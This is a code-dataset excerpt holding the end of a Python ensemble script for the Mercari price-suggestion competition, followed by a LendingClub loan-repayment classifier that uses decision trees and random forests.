token_pattern=r\"(?u)\\b\\w+\\b\",\n stop_words='english',\n binary=True\n )\n print(vec)\n count_matrix = vec.fit_transform(item_description[dataset['for_train']])\n count_matrix = sp.vstack([count_matrix, vec.transform(item_description[~dataset['for_train']])])\n\n 
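# (editor's note, added) drop_non_intersect_features below keeps only the n-gram columns that occur in both the train rows and the test rows.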
print(count_matrix.shape)\n    count_matrix = drop_non_intersect_features(count_matrix, dataset['for_train'].sum())\n    print(count_matrix.shape)\n\n    # assert np.unique(count_matrix.data) == [1]\n    return Feature('doc_term_of_description', count_matrix)\n\n\ndef calculate_each_row_mean(a):\n    row_sum = np.asarray(a.sum(axis=1)).reshape(-1)\n    row_nonzeros = a.getnnz(axis=1)\n    row_mean = np.divide(row_sum, row_nonzeros,\n                         out=np.full(shape=row_sum.shape, fill_value=np.nan),\n                         where=(row_nonzeros > 0))\n    return row_mean\n\n\ndef create_ngram_price_mean_(dataset, column, min_df, max_df, ngram_range):\n    timer = Timer(column + '_ngram_price_mean')\n    timer.print('Start')\n\n    vec = CountVectorizer(\n        min_df=min_df,\n        max_df=max_df,\n        ngram_range=ngram_range,\n        token_pattern=r\"(?u)\\b\\w+\\b\",\n        stop_words='english',\n        binary=True\n    )\n    texts = dataset[column].map(preprocess)\n    count_matrix = vec.fit_transform(texts[dataset['for_train']])\n    timer.print('Fitted')\n    all_count_matrix = vec.transform(texts)\n    timer.print('Transformed')\n\n    term_df = np.asarray(count_matrix.sum(axis=0)).reshape(-1)\n    assert term_df.shape[0] == count_matrix.shape[1]\n\n    log1p_price = dataset.loc[dataset['for_train'], 'log1p_price'].values\n    log1p_price_matrix = count_matrix.multiply(log1p_price.reshape(-1, 1))\n    term_log1p_price_mean = np.asarray(log1p_price_matrix.sum(axis=0)).reshape(-1) / term_df\n\n    term_log1p_price_mean_squared = np.asarray(log1p_price_matrix.power(2).sum(axis=0)).reshape(-1) / term_df\n    term_log1p_price_var = np.maximum(1e-6, term_log1p_price_mean_squared - term_log1p_price_mean ** 2)\n\n    features_df = pd.DataFrame()\n    bins = 20\n    _, seps = pd.qcut(term_log1p_price_var, bins, duplicates='drop', labels=False, retbins=True)\n    for i in range(len(seps) - 1):\n        lower, upper = seps[i], seps[i + 1]\n        selector = (lower <= term_log1p_price_var) & (term_log1p_price_var < upper)\n        # print('[lower, upper): {:4.3f} {:4.3f}'.format(lower, upper))\n\n        #\n        selected_term_mean = np.where(selector, term_log1p_price_mean, 0)\n        selected_mean_matrix = all_count_matrix.multiply(scipy.sparse.csc_matrix(selected_term_mean))\n        price_mean_mean = calculate_each_row_mean(selected_mean_matrix)\n\n        # #\n        # terms = selected_mean_matrix.getnnz(axis=1)\n        #\n        # #\n        # price_mean_var = calculate_each_row_mean(selected_mean_matrix.power(2)) - price_mean_mean ** 2\n\n        #\n        selected_term_df = np.where(selector, term_df, 0)\n        selected_df_matrix = all_count_matrix.multiply(scipy.sparse.csc_matrix(selected_term_df))\n        df_mean = calculate_each_row_mean(selected_df_matrix)\n\n        features_df['{}_price_mean_mean_{}'.format(column, i)] = price_mean_mean\n        # features_df['{}_price_mean_var_{}'.format(column, i)] = price_mean_var\n        # features_df['{}_terms_{}'.format(column, i)] = terms\n        # features_df['{}_df_mean_{}'.format(column, i)] = df_mean\n\n    timer.print('Done')\n    return features_df\n\n\ndef create_ngram_price_mean(dataset, column, min_df, max_df, ngram_range):\n\n    features_df = create_ngram_price_mean_(dataset, column, min_df, max_df, ngram_range)\n\n    feature_names = []\n    features = []\n    for c in features_df.columns:\n        feature_names.append(c)\n        features.append(features_df[c].values.reshape(-1, 1))\n\n    # nan or 0 ??\n    f = scipy.sparse.csr_matrix(np.hstack(features))\n\n    assert f.shape == (dataset.shape[0], len(feature_names))\n    return Feature(feature_names, f)\n\n\n# TODO: tune tol and alpha\ndef train_ridge_model(train_X, train_y):\n    ridge = Ridge(alpha=16.8, solver='sag', copy_X=False, fit_intercept=True, tol=0.01, max_iter=100,\n                  random_state=114514)\n    
ridge.fit(train_X, train_y)\n return ridge\n\n\ndef do_ridge_global(train_index):\n global g_all_train_X, g_all_train_y\n model = train_ridge_model(g_all_train_X[train_index], g_all_train_y[train_index])\n return model\n\n\ndef create_ridge_predict_stacking_feature(dataset, common_features: List[Feature]):\n timer = Timer('ridge_predict')\n timer.print('Start')\n gc.collect()\n\n train_size = dataset[dataset['for_train']].shape[0]\n\n train_one_hot_like_features = create_one_hot_like_features(common_features, 0, train_size, train_size, verbose=True)\n gc.collect()\n assert train_one_hot_like_features.shape[0] == train_size\n print(train_one_hot_like_features.shape)\n timer.print('Created one hot like features for train')\n\n global g_all_train_X, g_all_train_y\n g_all_train_X = train_one_hot_like_features\n g_all_train_y = dataset['log1p_price'][:train_size].values\n\n gc.collect()\n kf = KFold(n_splits=8, shuffle=True, random_state=810)\n models = Parallel(n_jobs=4, max_nbytes=None)(\n delayed(do_ridge_global)(train_index)\n for train_index, _ in kf.split(train_one_hot_like_features)\n )\n del g_all_train_X, g_all_train_y\n gc.collect()\n timer.print('Trained')\n\n preds = np.full(dataset.shape[0], -114514, dtype=np.float64)\n for i, (train_index, valid_index) in enumerate(kf.split(train_one_hot_like_features)):\n preds[valid_index] = models[i].predict(train_one_hot_like_features[valid_index])\n gc.collect()\n del train_one_hot_like_features\n gc.collect()\n timer.print('Predicted valid')\n\n test_size = dataset.shape[0] - train_size\n test_batches = 5\n test_batch_size = test_size // test_batches + 1\n for batch_i in range(test_batches):\n gc.collect()\n start = train_size + test_batch_size * batch_i\n end = train_size + min(test_size, test_batch_size * (batch_i + 1))\n test_X = create_one_hot_like_features(common_features, start, end, train_size)\n\n predss = []\n for model in models:\n predss.append(model.predict(test_X))\n preds[start:end] = np.mean(np.hstack([preds.reshape(-1, 1) for preds in predss]), axis=1)\n gc.collect()\n timer.print('Predicted test')\n\n print('total loss: ', rmse(preds[:train_size], dataset['log1p_price'][:train_size].values))\n timer.print('Trained ridge models')\n\n return Feature('ridge_pred', preds.reshape(dataset.shape[0], 1))\n\n\nimport copy\nimport fastFM.als\n\n\ndef do_single_fm(train_X, train_y, valid_X, valid_y, l2_reg_V=600):\n train_i = 0\n timer = Timer('fm_{}'.format(train_i))\n timer.print('Start')\n\n model = fastFM.als.FMRegression(n_iter=0, init_stdev=0.0001, rank=8, l2_reg_w=20, l2_reg_V=l2_reg_V)\n model.fit(train_X, train_y)\n train_loss = rmse(model.predict(train_X), train_y)\n valid_loss = rmse(model.predict(valid_X), valid_y)\n\n train_losses = [train_loss]\n valid_losses = [valid_loss]\n for iter_i in range(10):\n prev_model = copy.deepcopy(model)\n\n model.fit(train_X, train_y, n_more_iter=1)\n timer.print('Fitted')\n\n train_loss = rmse(model.predict(train_X), train_y)\n valid_loss = rmse(model.predict(valid_X), valid_y)\n timer.print('Predicted')\n\n train_losses.append(train_loss)\n valid_losses.append(valid_loss)\n timer.print('loss {} / iter {:2d}: {:7.5f}, {:7.5f}'.format(train_i, iter_i, train_loss, valid_loss))\n\n if valid_loss > valid_losses[-2]:\n model = prev_model\n break\n\n train_loss = rmse(model.predict(train_X), train_y)\n valid_loss = rmse(model.predict(valid_X), valid_y)\n print('loss {}: {}, {}'.format(train_i, train_loss, valid_loss))\n timer.print('Done')\n\n return model\n\n\ndef 
create_fm_predict_stacking_feature(dataset, common_features: List[Feature]):\n timer = Timer('fm_predict')\n timer.print('Start')\n\n train_size = dataset[dataset['for_train']].shape[0]\n\n one_hot_like_features = create_one_hot_like_features(common_features, 0, dataset.shape[0], train_size)\n assert one_hot_like_features.shape[0] == dataset.shape[0]\n print(one_hot_like_features.shape)\n timer.print('Created one hot like features')\n\n all_train_X = one_hot_like_features[:train_size]\n all_train_y = dataset['log1p_price'][:train_size].values\n\n models = []\n preds = np.full(dataset.shape[0], -114514, dtype=np.float64)\n kf = KFold(n_splits=8, shuffle=True, random_state=810)\n for train_i, (train_index, valid_index) in enumerate(kf.split(all_train_X)):\n train_X, valid_X = all_train_X[train_index], all_train_X[valid_index]\n train_y, valid_y = all_train_y[train_index], all_train_y[valid_index]\n\n model = do_single_fm(train_X, train_y, valid_X, valid_y)\n\n valid_preds = model.predict(valid_X)\n preds[valid_index] = valid_preds\n\n print('loss {}:'.format(train_i), rmse(valid_preds, valid_y))\n\n models.append(model)\n\n timer.print('Trained fm model {}'.format(train_i))\n\n print('total loss: ', rmse(preds[:train_size], all_train_y))\n\n test_X = one_hot_like_features[train_size:]\n preds[train_size:] = np.mean(np.hstack([model.predict(test_X).reshape(test_X.shape[0], 1) for model in models]), axis=1)\n timer.print('Trained fm models')\n\n return Feature('fm_pred', preds.reshape(dataset.shape[0], 1))\n\n\nimport keras\nimport keras.preprocessing.text\nfrom keras.layers import Conv1D, GlobalMaxPooling1D, BatchNormalization\nfrom keras.layers import Input, Embedding, Dropout, Dense, Flatten\nfrom keras import backend as K\nimport tensorflow as tf\n\nmaxlen_desc = 100\nmaxlen_name = 13\n\n\ndef build_cnn(\n num_words, maxlen_name, maxlen_desc, num_categories1, num_categories2, num_categories3,\n num_brand_names, num_item_conditions, additional_feature_names,\n hyper_params\n):\n input_desc = Input((maxlen_desc,), name='desc')\n embedding_layer_desc = Embedding(num_words, hyper_params['desc_embedding'])\n embedding_desc = embedding_layer_desc(input_desc)\n\n input_name = Input((maxlen_name,), name='name')\n embedding_layer_name = Embedding(num_words, hyper_params['name_embedding'])\n embedding_name = embedding_layer_name(input_name)\n\n input_category1 = Input((1,), name='category1')\n input_category2 = Input((1,), name='category2')\n input_category3 = Input((1,), name='category3')\n embedding_category1 = Embedding(num_categories1, hyper_params['category1_embedding'])(input_category1)\n embedding_category2 = Embedding(num_categories2, hyper_params['category2_embedding'])(input_category2)\n embedding_category3 = Embedding(num_categories3, hyper_params['category3_embedding'])(input_category3)\n\n input_brand_name = Input((1,), name='brand_name')\n embedding_brand_name = Embedding(num_brand_names, hyper_params['brand_name_embedding'])(input_brand_name)\n\n input_item_condition = Input((1,), name='item_condition')\n embedding_item_condition = Embedding(num_item_conditions, 2)(input_item_condition)\n\n input_shipping = Input((1,), name='shipping')\n embedding_shipping = Embedding(2, 1)(input_shipping)\n\n cnn_desc = Conv1D(filters=hyper_params['desc_filters'], kernel_size=3, activation='relu')(embedding_desc)\n cnn_desc = GlobalMaxPooling1D()(cnn_desc)\n dense_desc = cnn_desc\n\n cnn_name = Conv1D(filters=hyper_params['name_filters'], kernel_size=3, activation='relu')(embedding_name)\n cnn_name = 
GlobalMaxPooling1D()(cnn_name)\n dense_name = cnn_name\n\n numerical_feature_names = [\n 'name_len',\n 'desc_len',\n 'name_count_words',\n 'desc_count_words',\n 'category1_mean',\n 'category2_mean',\n\n *additional_feature_names\n ]\n numerical_feature_inputs = [Input((1,), name=feature_name) for feature_name in numerical_feature_names]\n\n x = keras.layers.concatenate([\n dense_desc,\n dense_name,\n Flatten()(embedding_category1),\n Flatten()(embedding_category2),\n Flatten()(embedding_category3),\n Flatten()(embedding_brand_name),\n Flatten()(embedding_item_condition),\n Flatten()(embedding_shipping),\n\n *numerical_feature_inputs\n ])\n\n x = BatchNormalization()(x)\n x = Dropout(hyper_params['dropout0'])(Dense(hyper_params['dense0'], activation='relu')(x))\n x = BatchNormalization()(x)\n x = Dropout(hyper_params['dropout1'])(Dense(hyper_params['dense1'], activation='relu')(x))\n x = BatchNormalization()(x)\n output = Dense(1, activation='linear')(x)\n\n model = keras.Model(\n [\n input_desc,\n input_name,\n input_category1,\n input_category2,\n input_category3,\n input_brand_name,\n input_item_condition,\n input_shipping,\n\n *numerical_feature_inputs\n ],\n output)\n model.compile(loss='mse', optimizer=keras.optimizers.Adam())\n return model\n\n\ndef to_seqs(tokenizer, texts, maxlen):\n return keras.preprocessing.sequence.pad_sequences(tokenizer.texts_to_sequences(texts), maxlen=maxlen,\n truncating='post')\n\n\ndef convert_to_input(tokenizer, dataset, additional_feature_dict):\n timer = Timer('convert_to_input')\n timer.print('Start')\n\n batches = 4\n batch_size = dataset.shape[0] // batches + 1\n\n name = np.concatenate(\n Parallel(n_jobs=4)(\n delayed(to_seqs)(tokenizer, name_batch, maxlen_name)\n for name_batch in [dataset.name[batch_size * i:batch_size * (i + 1)].values for i in range(batches)]\n )\n )\n gc.collect()\n timer.print('Done name')\n\n desc = np.concatenate(\n Parallel(n_jobs=4)(\n delayed(to_seqs)(tokenizer, desc_batch, maxlen_desc)\n for desc_batch in [dataset.item_description[batch_size * i:batch_size * (i + 1)].values for i in range(batches)]\n )\n )\n gc.collect()\n timer.print('Done desc')\n\n category1 = LabelEncoder().fit_transform(dataset['category1']).reshape(dataset.shape[0], 1)\n category2 = LabelEncoder().fit_transform(dataset['category2']).reshape(dataset.shape[0], 1)\n category3 = LabelEncoder().fit_transform(dataset['category3']).reshape(dataset.shape[0], 1)\n\n brand_name = LabelEncoder().fit_transform(dataset['brand_name']).reshape(dataset.shape[0], 1)\n\n item_condition = LabelEncoder().fit_transform(dataset['item_condition_id']).reshape(dataset.shape[0], 1)\n\n shipping = LabelEncoder().fit_transform(dataset['shipping']).reshape(dataset.shape[0], 1)\n\n name_len = StandardScaler().fit_transform(dataset['name'].str.len().values.reshape(-1, 1))\n desc_len = StandardScaler().fit_transform(dataset['item_description'].str.len().values.reshape(-1, 1))\n name_count_words = StandardScaler().fit_transform(dataset['name'].str.count(' ').values.reshape(-1, 1))\n desc_count_words = StandardScaler().fit_transform(dataset['item_description'].str.count(' ').values.reshape(-1, 1))\n\n category1_mean = dataset['category1'].map(dataset.groupby('category1')['log1p_price'].mean()).values.reshape(-1, 1)\n category2_mean = dataset['category2'].map(dataset.groupby('category2')['log1p_price'].mean()).values.reshape(-1, 1)\n\n timer.print('Almost done')\n\n keras_input = {\n 'name': name,\n 'desc': desc,\n 'category1': category1,\n 'category2': category2,\n 'category3': 
category3,\n 'brand_name': brand_name,\n 'item_condition': item_condition,\n 'shipping': shipping,\n\n 'name_len': name_len,\n 'desc_len': desc_len,\n 'name_count_words': name_count_words,\n 'desc_count_words': desc_count_words,\n\n 'category1_mean': category1_mean,\n 'category2_mean': category2_mean,\n\n **additional_feature_dict\n }\n print(list(keras_input.keys()))\n for vals in keras_input.values():\n assert vals.shape[0] == dataset.shape[0]\n return keras_input\n\n\ndef create_keras_input_etc(dataset):\n timer = Timer('keras')\n\n # TODO: only train?\n tokenizer = keras.preprocessing.text.Tokenizer()\n tokenizer.fit_on_texts(\n dataset[dataset['for_train']]['item_description'].tolist() +\n dataset[dataset['for_train']]['name'].tolist()\n )\n gc.collect()\n timer.print('Tokenized')\n\n num_words = len(tokenizer.word_index) + 1 # +1 is for padding\n num_brand_names = dataset['brand_name'].unique().size\n num_item_conditions = dataset['item_condition_id'].unique().size\n\n num_categories1 = dataset['category1'].unique().size\n num_categories2 = dataset['category2'].unique().size\n num_categories3 = dataset['category3'].unique().size\n\n timer.print('Prepared dataset')\n\n ##\n f = create_ngram_price_mean_(dataset, 'name', min_df=30, max_df=10000, ngram_range=(1, 3))\n f.fillna(dataset['log1p_price'].mean(), inplace=True)\n\n features_dict = {}\n for c in f.columns:\n features_dict[c] = StandardScaler().fit_transform(f[c].values.reshape(-1, 1)).reshape(-1, 1)\n timer.print('Created additional features')\n\n keras_input = convert_to_input(tokenizer, dataset, additional_feature_dict=features_dict)\n timer.print('Converted to keras input')\n\n info_to_build_nn = {\n 'num_words': num_words,\n 'maxlen_name': maxlen_name,\n 'maxlen_desc': maxlen_desc,\n 'num_categories1': num_categories1,\n 'num_categories2': num_categories2,\n 'num_categories3': num_categories3,\n 'num_brand_names': num_brand_names,\n 'num_item_conditions': num_item_conditions,\n 'additional_feature_names': list(features_dict.keys()),\n }\n\n return {\n 'keras_input': keras_input,\n 'info_to_build_nn': info_to_build_nn,\n }\n\n\ndef do_keras(dataset):\n keras_input_etc = create_keras_input_etc(dataset)\n keras_input = keras_input_etc['keras_input']\n info_to_build_nn = keras_input_etc['info_to_build_nn']\n\n def slice_keras_input(keras_input, begin, end):\n return {input_name: data[begin:end] for input_name, data in keras_input.items()}\n\n train_size = dataset[dataset['for_train']].shape[0]\n valid_size = dataset[dataset['labeled'] & ~dataset['for_train']].shape[0]\n\n train_y = dataset['log1p_price'][:train_size].values\n valid_y = dataset['log1p_price'][train_size:train_size + valid_size]\n\n train_input = slice_keras_input(keras_input, 0, train_size)\n valid_input = slice_keras_input(keras_input, train_size, train_size + valid_size)\n test_input = slice_keras_input(keras_input, train_size + valid_size, dataset.shape[0])\n\n hyper_params = {'batch_size': 2400,\n 'brand_name_embedding': 64,\n 'category1_embedding': 4,\n 'category2_embedding': 16,\n 'category3_embedding': 64,\n 'dense0': 610,\n 'dense1': 4,\n 'desc_embedding': 8,\n 'desc_filters': 32,\n 'dropout0': 0.41489440606260775,\n 'dropout1': 0.004588996677574161,\n 'lr0': 0.01100919733836959,\n 'lr1': 0.0004210931494001088,\n 'lr2': 0.0025172435657187654,\n 'name_embedding': 16,\n 'name_filters': 64}\n\n with tf.Session(config=tf.ConfigProto(intra_op_parallelism_threads=4)) as sess:\n K.set_session(sess)\n\n model = build_cnn(hyper_params=hyper_params, 
**info_to_build_nn)\n\n        lr_table = [hyper_params['lr0'], hyper_params['lr1'], hyper_params['lr2']]\n        model.fit(\n            train_input, train_y,\n            validation_data=(valid_input, valid_y),\n            batch_size=hyper_params['batch_size'],\n            epochs=len(lr_table),\n            callbacks=[LearningRateScheduler(lambda episode_i: lr_table[episode_i])]\n        )\n\n        valid_preds = model.predict(valid_input, batch_size=2048).reshape(-1)\n        test_preds = model.predict(test_input, batch_size=2048).reshape(-1)\n\n        del model\n        gc.collect()\n\n    print(rmse(valid_preds, valid_y))\n\n    return {\n        'valid_preds': valid_preds,\n        'test_preds': test_preds\n    }\n\n\ndef create_lgb_feature(features: List[Feature], start, end):\n    lgb_features = []\n    categorical_feature_indices = []\n\n    index = 0\n    for feature in features:\n        gc.collect()\n        lgb_feature = feature.get_lgb_features()[start:end]\n        lgb_features.append(lgb_feature)\n\n        if feature.get_feature_type() == FeatureType.CATEGORICAL:\n            categorical_feature_indices.extend([index + i for i in range(lgb_feature.shape[1])])\n\n        index += lgb_feature.shape[1]\n    gc.collect()\n\n    lgb_features = scipy.sparse.hstack(lgb_features, dtype=np.float64).tocsr()\n    print('lgb_features.shape:', lgb_features.shape)\n    gc.collect()\n\n    # TODO: comment out\n    assert lgb_features.shape[0] == end - start\n\n    return lgb_features, categorical_feature_indices\n\n\ndef train_lgb_model(dataset, features: List[Feature]):\n    timer = Timer('train_lgb_model')\n    timer.print('Start')\n\n    train_size = dataset['for_train'].sum()\n\n    train_X, categorical_feature = create_lgb_feature(features, 0, train_size)\n    train_y = dataset[:train_size]['log1p_price'].values\n    d_train = lgb.Dataset(train_X, train_y, categorical_feature=categorical_feature)\n    del train_X, train_y, categorical_feature\n    gc.collect()\n    timer.print('Created Dataset')\n\n    params = {\n        'application': 'regression',\n        'metric': 'RMSE',\n        'learning_rate': 0.3,\n        # 'max_bin': 8192,\n        'verbosity': -1,\n        'seed': 114514,\n        'nthread': 4\n    }\n    model = lgb.train(\n        params,\n        train_set=d_train,\n        # valid_sets=[d_train, d_valid],\n        num_boost_round=900,\n        # early_stopping_rounds=100,\n        verbose_eval=100\n    )\n    gc.collect()\n    timer.print('Trained')\n\n    return model\n\n\ndef lgb_predict_test(dataset, features: List[Feature]):\n    timer = Timer('lgb_predict_test')\n    model = train_lgb_model(dataset, features)\n    timer.print('Trained')\n\n    train_size = dataset['for_train'].sum()\n    test_size = dataset.shape[0] - train_size\n    test_batches = 5\n    test_batch_size = test_size // test_batches + 1\n\n    test_preds = np.full(test_size, -114514, dtype=np.float64)\n    for batch_i in range(test_batches):\n        gc.collect()\n        start = test_batch_size * batch_i\n        end = min(test_size, test_batch_size * (batch_i + 1))\n        test_X = create_lgb_feature(features, train_size + start, train_size + end)[0]\n        test_preds[start:end] = model.predict(test_X)\n    gc.collect()\n    timer.print('Predicted test')\n\n    return test_preds\n\n\ndef main():\n    # price mean, different ngrams\n    timer = Timer('main')\n    timer.print('Start')\n\n    # dataset = read_dataset(down_sampling_rate=0.001, train_size=0.9)\n    dataset = read_dataset(train_size=0.999) # with train_size == 1, valid_size == 0 and the script dies\n    timer.print('Loaded dataset')\n\n    keras_result = do_keras(dataset)\n    gc.collect()\n    timer.print('Done keras')\n\n    common_features = create_features(dataset)\n    timer.print('Created features')\n\n    feature_hyper_params = {\n        'name_term': {\n            'min_df': 1,\n            'ngram_range': (1, 3),\n        },\n        'desc_term': {\n            'min_df': 3,\n            'ngram_range': (1, 2),\n        },\n    }\n    sparse_features = 
create_sparse_features(dataset, feature_hyper_params)\n gc.collect()\n timer.print('Created sparse features')\n\n common_lgb_features = common_features + sparse_features\n common_lgb_features.append(create_ngram_price_mean(dataset, 'name', min_df=30, max_df=10000, ngram_range=(1, 3)))\n timer.print('Done create_ngram_price_mean')\n gc.collect()\n\n columns_to_keep = ['for_train', 'id', 'labeled', 'log1p_price', 'price']\n columns_to_drop = [c for c in dataset.columns if c not in columns_to_keep]\n for c in columns_to_drop:\n del dataset[c]\n gc.collect()\n\n common_lgb_features.append(create_ridge_predict_stacking_feature(dataset, common_features + sparse_features))\n gc.collect()\n timer.print('Done ridge predict')\n\n # common_lgb_features.append(create_fm_predict_stacking_feature(dataset, common_features + sparse_features))\n # timer.print('Done fm predict')\n\n lgb_test_preds_ = lgb_predict_test(dataset, common_lgb_features)\n timer.print('lgb Predicted test')\n\n train_size = dataset['for_train'].sum()\n valid_size = dataset['labeled'].sum() - train_size\n lgb_valid_preds = lgb_test_preds_[:valid_size]\n\n lgb_test_preds = lgb_test_preds_[valid_size:]\n\n ensemble_valid_preds = 0.7 * lgb_valid_preds + 0.3 * keras_result['valid_preds']\n ensemble_test_preds = 0.7 * lgb_test_preds + 0.3 * keras_result['test_preds']\n\n valid_train_y = dataset[train_size:train_size + valid_size]['log1p_price'].values\n print('lgb loss:', rmse(lgb_valid_preds, valid_train_y))\n print('CNN loss:', rmse(keras_result['valid_preds'], valid_train_y))\n print('Ensemble loss:', rmse(ensemble_valid_preds, valid_train_y))\n\n submission = pd.DataFrame()\n submission['test_id'] = dataset['id'][train_size + valid_size:]\n submission['price'] = np.expm1(ensemble_test_preds) # TODO 3 clip\n submission.to_csv('submission.csv', index=False)\n timer.print('Saved submission.csv')\n\n return {\n 'lgb_valid_preds': lgb_valid_preds,\n 'keras_result': keras_result,\n 'dataset': dataset,\n\n # 'ridge_feature': ridge_feature\n }\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/mercari-price-suggestion-challenge/takapt/adjustcnnparams.py","file_name":"adjustcnnparams.py","file_ext":"py","file_size_in_byte":36259,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"25024533390","text":"# We will use lending data from 2007-2010 and try to classify and predict whether or not the borrower paid back their loan in full\n\n# Here are what the columns represent:\n# credit.policy: 1 if the customer meets the credit underwriting criteria of LendingClub.com, and 0 otherwise.\n# purpose: The purpose of the loan (takes values \"credit_card\", \"debt_consolidation\", \"educational\", \"major_purchase\", \"small_business\", and \"all_other\").\n# int.rate: The interest rate of the loan, as a proportion (a rate of 11% would be stored as 0.11). 
Borrowers judged by LendingClub.com to be more risky are assigned higher interest rates.\n# installment: The monthly installments owed by the borrower if the loan is funded.\n# log.annual.inc: The natural log of the self-reported annual income of the borrower.\n# dti: The debt-to-income ratio of the borrower (amount of debt divided by annual income).\n# fico: The FICO credit score of the borrower.\n# days.with.cr.line: The number of days the borrower has had a credit line.\n# revol.bal: The borrower's revolving balance (amount unpaid at the end of the credit card billing cycle).\n# revol.util: The borrower's revolving line utilization rate (the amount of the credit line used relative to total credit available).\n# inq.last.6mths: The borrower's number of inquiries by creditors in the last 6 months.\n# delinq.2yrs: The number of times the borrower had been 30+ days past due on a payment in the past 2 years.\n# pub.rec: The borrower's number of derogatory public records (bankruptcy filings, tax liens, or judgments).\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import classification_report,confusion_matrix\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import RandomizedSearchCV\n\n# Get the Data\nloans = pd.read_csv('loan_data.csv')\n\nprint(loans.head())\nprint(loans.describe())\nprint(loans.info())\n\n# Exploratory Data Analysis\n\n# histogram of two FICO distributions on top of each other, one for each credit.policy outcome\nplt.figure(figsize=(10,6))\nloans[loans['credit.policy']==1]['fico'].hist(alpha=0.5,color='blue',bins=30,label='Credit.Policy=1')\nloans[loans['credit.policy']==0]['fico'].hist(alpha=0.5,color='red',bins=30,label='Credit.Policy=0')\nplt.legend()\nplt.xlabel('FICO')\n# plt.show()\n\n# histogram of two FICO distributions on top of each other, one for each not.fully.paid outcome\nplt.figure(figsize=(10,6))\nloans[loans['not.fully.paid']==1]['fico'].hist(alpha=0.5,color='blue',bins=30,label='not.fully.paid=1')\nloans[loans['not.fully.paid']==0]['fico'].hist(alpha=0.5,color='red',bins=30,label='not.fully.paid=0')\nplt.legend()\nplt.xlabel('FICO')\n# plt.show()\n\n# countplot using seaborn showing the counts of loans by purpose, with the color hue defined by not.fully.paid\nplt.figure(figsize=(11,7))\nsns.countplot(x='purpose',hue='not.fully.paid',data=loans,palette='Set1')\n# plt.show()\n\n# jointplot to see the trend between FICO score and interest rate\nsns.jointplot(x='fico',y='int.rate',data=loans,color='purple')\n# plt.show()\n\n# lmplots to see if the trend differed between not.fully.paid and credit.policy\nplt.figure(figsize=(11,7))\nsns.lmplot(y='int.rate',x='fico',data=loans,hue='credit.policy',col='not.fully.paid',palette='Set1')\n# plt.show()\n\n# Setting up the Data\n# Categorical Features - notice the purpose is a Categorical feature\nfinal_data = pd.get_dummies(loans,columns=['purpose'],drop_first=True)\n\nprint(final_data.info())\n\n# Training and Testing Data\n# X - independent variable, features\n# y - dependent variable, target\nX = final_data.drop('not.fully.paid',axis=1)\ny = final_data['not.fully.paid']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30)\n\n# Training a Decision Tree Model\nprint(\"\\n### DECISION TREE ###\\n\")\n\n# Create an instance of DecisionTreeClassifier()\ndtree = DecisionTreeClassifier()\n\n# 
train / fit the DecisionTreeClassifier instance\ndtree.fit(X_train,y_train)\n\n# Predict values from X_test\npredictions = dtree.predict(X_test)\n\n# Evaluate the model, pass true values and predictions to classification_report\nprint('Classification Report:\\n',classification_report(y_test,predictions))\nprint('\\nConfusion Matrix:\\n',confusion_matrix(y_test,predictions))\nprint(f'Model Accuracy: {dtree.score(X_test, y_test)}')\n\n# Features and their importance\n# features considered most important by the Decision Tree\nprint(\"\\nFeatures and Importance:\")\nfeat_imp = pd.DataFrame({'feature': list(X_train.columns),'importance': dtree.feature_importances_}).sort_values('importance', ascending = False)\nprint(feat_imp)\n\n\n# Random Forests\nprint(\"\\n### RANDOM FOREST ###\\n\")\n# compare the decision tree model to a random forest.\n\n# Create instance of RandomForestClassifier\nrfc = RandomForestClassifier(n_estimators=100)\n\n# train / fit the RandomForestClassifier instance\nrfc.fit(X_train, y_train)\n\n# Predict values from X_test\nrfc_pred = rfc.predict(X_test)\n\n# Evaluate the model, pass true values and predictions to classification_report\nprint('Classification Report:\\n',classification_report(y_test,rfc_pred))\nprint('\\nConfusion Matrix:\\n',confusion_matrix(y_test,rfc_pred))\nprint(f'Model Accuracy: {rfc.score(X_test, y_test)}')\n\n# Features and their importance\n# features considered most important by the Random Forest\nprint(\"\\nFeatures and Importance:\")\nfeat_imp = pd.DataFrame({'feature': list(X_train.columns),'importance': rfc.feature_importances_}).sort_values('importance', ascending = False)\nprint(feat_imp)\n\n\n# Random Forest Optimization through Random Search\n# to maximize the performance of the random forest, we can perform a random search for better hyperparameters\n# This will randomly select combinations of hyperparameters from a grid,\n# evaluate them using cross validation on the training data, and return the values that perform the best\n\n# Hyperparameter grid\nparam_grid = {\n    'n_estimators': np.linspace(10, 200).astype(int),\n    'max_depth': [None] + list(np.linspace(3, 20).astype(int)),\n    'max_features': ['auto', 'sqrt', None] + list(np.arange(0.5, 1, 0.1)),\n    'max_leaf_nodes': [None] + list(np.linspace(10, 50, 500).astype(int)),\n    'min_samples_split': [2, 5, 10],\n    'bootstrap': [True, False]\n}\n\n# Estimator for use in random search\nestimator = RandomForestClassifier()\n\n# Create the random search model\nrs = RandomizedSearchCV(estimator, param_grid, n_jobs = -1,\n                        scoring = 'roc_auc', cv = 3,\n                        n_iter = 10, verbose = 1)\n\n# Fit / train RandomizedSearchCV instance\nrs.fit(X_train, y_train)\n\nprint(f'The list of best parameters:\\n {rs.best_params_}')\n\n# Use the best model out of the RandomizedSearchCV instance\nbest_model = rs.best_estimator_\nprint('### BEST MODEL OF RANDOM FOREST ###\\n')\n\n# train / fit the best model\nbest_model.fit(X_train, y_train)\n\n# Predict values from X_test off of best_model\nbest_model_pred = best_model.predict(X_test)\n\n# Evaluate the best model, pass true values and predictions to classification_report\nprint('Classification Report:\\n',classification_report(y_test,best_model_pred))\nprint('\\nConfusion Matrix:\\n',confusion_matrix(y_test,best_model_pred))\nprint(f'Model Accuracy: {best_model.score(X_test, y_test)}')\n
